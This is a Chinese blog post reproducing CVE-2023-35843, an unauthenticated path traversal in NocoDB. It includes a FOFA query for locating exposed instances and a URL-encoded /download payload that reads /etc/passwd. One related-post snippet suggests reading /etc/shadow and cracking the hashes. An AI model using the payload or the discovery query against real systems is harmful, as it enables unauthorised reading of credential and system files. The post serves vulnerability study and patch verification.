NocoDB 文件读取(CVE-2023-35843)

最新推荐文章于 2024-09-13 10:43:16 发布
最新推荐文章于 2024-09-13 10:43:16 发布
阅读量436 收藏
点赞数
分类专栏: 网络安全 web安全 渗透测试 漏洞复现 文章标签: 安全 漏洞复现 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/131762416
版权
NocoDB 0.106.1之前的版本存在路径遍历漏洞,攻击者能通过下载路由参数访问服务器任意文件,包括敏感数据。免责声明提醒读者技术仅供学习,禁止非法用途。
摘要由CSDN通过智能技术生成

漏洞描述

NocoDB版本小于0.106.1存在路径遍历漏洞,未经身份验证的攻击者可通过操纵/download路由的路径参数来访问服务器上的任意文件。此漏洞允许攻击者访问服务器上的敏感文件和数据,包括配置文件、源代码和其他敏感信息。
在这里插入图片描述

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa:icon_hash="-2017596142"

漏洞复现
1.使用如下payload读取目标passwd文件

/download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

在这里插入图片描述

丢了少年失了心1
关注
专栏目录
订阅专栏
Lightdash 任意文件读取 CVE-2023-35844
失心少年
06-27 614
Lightdash 0.510.3之前版本中的Packages/Backend/src/Routers具有不安全文件端点,例如,它们允许…目录遍历,并且不确保使用预期的文件扩展名(.csv或.png)。
NocoDB 开源项目使用教程
gitblog_00099的博客
08-10 526
NocoDB 开源项目使用教程 nocodbnocodb/nocodb: 是一个基于 node.js 和 SQLite 数据库的开源 NoSQL 数据库,它提供了可视化的 Web 界面用于管理和操作数据库。适合用于构建简单的 NoSQL 数据库,特别是对于需要轻量级、易于使用的数据库场景。特点是轻量级、易于使用、基于 node.js 和 SQLite 数据库。项目地址:https://gitco...
What is NocoDB, NocoDB is an open source platform that turns any database into a smart spreadsheet
BigDataSmallTeam 大数据小团队--蒙昭良的博客
01-27 1715
NocoDB is an open source#NoCodeplatform that turns any database into a smart spreadsheet Prerequisites Must haves node.js >= 12/Docker MySql/Postgres/SQLserver/ SQLite Database Nice to haves Existing schemas can help to create AP...
NocoBase 与 NocoDB:开源无代码工具深度对比
最新发布
NocoBase 的博客
09-13 1490
本文详细对比了两款开源无代码工具 NocoBase 和 NocoDB,从功能特性、用户体验、集成能力和企业级功能等多个维度,帮助你深入且全面了解。
CVE-2023-35843NocoDB 任意文件读取漏洞(CVE-2023-35843
m0_46317063的博客
06-29 663
cve-2023-35843
NocoDB:在任何数据库上创建即时电子表格和 REST API。
o1lab的博客
09-30 6836
NocoDB 是一个免费的开源工具,可以在任何数据库上创建智​​能电子表格和 REST APIs。 NocoDB 的工作原理是连接到任何关系数据库并将它们转换为智能电子表格界面 + 为您提供即时 REST API!这允许您与团队协作构建无代码应用程序。 NocoDB 目前适用于 MySQL、PostgreSQL、Microsoft SQL Server、SQLite、Amazon Aurora 和 MariaDB 数据库。 快速尝试 使用Docker docker run -d --n..
安装NocoDB
make_progress的博客
03-07 2314
NocoDB是Airtable的开源替代品,将 MySQL、PostgreSQL、SQL Server、SQLite 或 MariaDB 转换为智能电子表格。👉 特色功能是协同编辑电子表格。
推荐开源项目:NocoDB - 开源Airtable替代品
gitblog_00071的博客
05-10 746
推荐开源项目:NocoDB - 开源Airtable替代品 nocodbnocodb/nocodb: 是一个基于 node.js 和 SQLite 数据库的开源 NoSQL 数据库,它提供了可视化的 Web 界面用于管理和操作数据库。适合用于构建简单的 NoSQL 数据库,特别是对于需要轻量级、易于使用的数据库场景。特点是轻量级、易于使用、基于 node.js 和 SQLite 数据库。项目地址...
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
2023年,OpenSSH发现了一个名为CVE-2023-38408的安全漏洞,这个漏洞可能允许攻击者在特定条件下绕过身份验证或执行未授权的操作,对系统安全构成威胁。为了保护您的系统不受此漏洞影响,及时升级到OpenSSH 9.5p1...
nocodb::fire: :fire: 开源 Airtable 替代方案 - 由 Vue.js 提供支持 :rocket: :rocket:
08-03
:sparkles: 开源 Airtable 替代方案 :sparkles: 将任何 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。 • • 快速尝试 一键部署 赫鲁库 使用 Docker docker run -d --name nocodb -p 8080:8080 nocodb/nocodb 使用 Npm npx create-nocodb-app 使用 Git git clone https://github.com/nocodb/nocodb-seed cd nocodb-seed npm install npm start 图形用户界面 访问仪表板使用: http://localhost:8080/dashboard 加入我们的社区 截图 特征 丰富的电子表格界面 :high_voltage: 轻松搜索、排序、过滤、隐藏列 :high_voltage: 创建视图:
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
NocoDB 安装使用
ur home
08-16 4719
NocoDB is an open source Airtable alternative. NocoDB works by connecting to any relational database and transforming them into a smart spreadsheet interface! This allows you to build no-code applications collaboratively with teams. NocoDB currentl...
NocoDB:把任意数据库转换成智能表格 | 开源日报 No.112
开源服务指南
12-17 1759
Kata Containers 是一个开源项目和社区,旨在构建轻量级虚拟机 (VMs) 的标准实现,使其在性能上表现得像容器一样,同时提供 VMs 级别的工作负载隔离和安全优势。它提供了类似容器的体验,支持多种架构和虚拟化技术,同时提供了详细的文档、配置文件和 Hypervisor 相关信息。如果你对虚拟化和容器技术感兴趣,Kata Containers 是一个值得关注的项目。
Airtable的开源替代方案NocoDB
wbsu2004的博客
08-27 9548
什么是 Airtable ? Airtable 是新型的在线表格制作工具,不仅局限于表格,它还可以把文字、图片、链接、文档等各种资料整合在一起。是电子表格-数据库混合体,具有数据库的功能,但实际上还是电子表格。 什么是 REST API ? REST API 也称为 RESTful API,是遵循 REST 架构规范的应用编程接口(API 或 Web API),支持与 RESTful Web 服务进行交互。REST 是表述性状态传递的英文缩写(Representational State Trans.
使用 NocoDB 一键将各种数据库转换为智能表格
云原生实验室
03-26 1414
NocoDB 作为一款免费开源的 Airtable 替代品,在许多在线数据管理场景下可以实现类似的功能和使用体验,且没有付费门槛和厂商锁定风险,对预算有限或注重数据自主可控的个人和组织还是很有吸引力的。通过自部署或使用免费的托管服务,就可以快速创建功能丰富的在线数据库,并利用 API 进一步开发应用。尽管 NocoDB 目前在功能和生态方面还不如 Airtable,但其开源、免费、易用、可扩展的特点已经足以成为一个值得关注的 Airtable 替代方案。
漏洞复现--NocoDB 任意文件读取(CVE-2023-35843)
qq_53003652的博客
10-08 243
NocoDB 是 Airtable 的开源替代方案,可以“一键”将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞。可通过读取/etc/shadow读取到加密后的用户名密码,解密后进行后续测试工作。
CVE-2023-4206、CVE-2023-4207 和 CVE-2023-4208)
08-15
这三个CVE编号(CVE-2023-4206、CVE-2023-4207 和 CVE-2023-4208)都是信息安全领域中对潜在漏洞的标识。每个CVE代表一个独立的已知安全威胁,可能会影响不同的软件产品、服务或协议。这些漏洞可能是关于: - **...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值